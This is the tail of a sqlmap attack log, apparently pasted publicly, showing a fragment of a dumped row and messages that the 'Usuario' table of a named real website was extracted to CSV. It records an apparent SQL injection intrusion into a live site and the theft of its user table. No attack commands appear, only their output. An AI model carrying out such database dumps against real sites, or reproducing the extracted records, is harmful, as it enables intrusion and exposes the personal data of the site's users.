  460. | Roldao |
  461. |
  462. +---------------------+
  463.  
  464. [22:13:31] [INFO] Table 'brasil2.Usuario' dumped to CSV file '/pentest/database/sqlmap/output/www.brasil.org.bo/dump/brasil2/Usuario.csv'
  465. [22:13:31] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.brasil.org.bo'
  466.  
  467. [*] shutting down at: 22:13:31
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!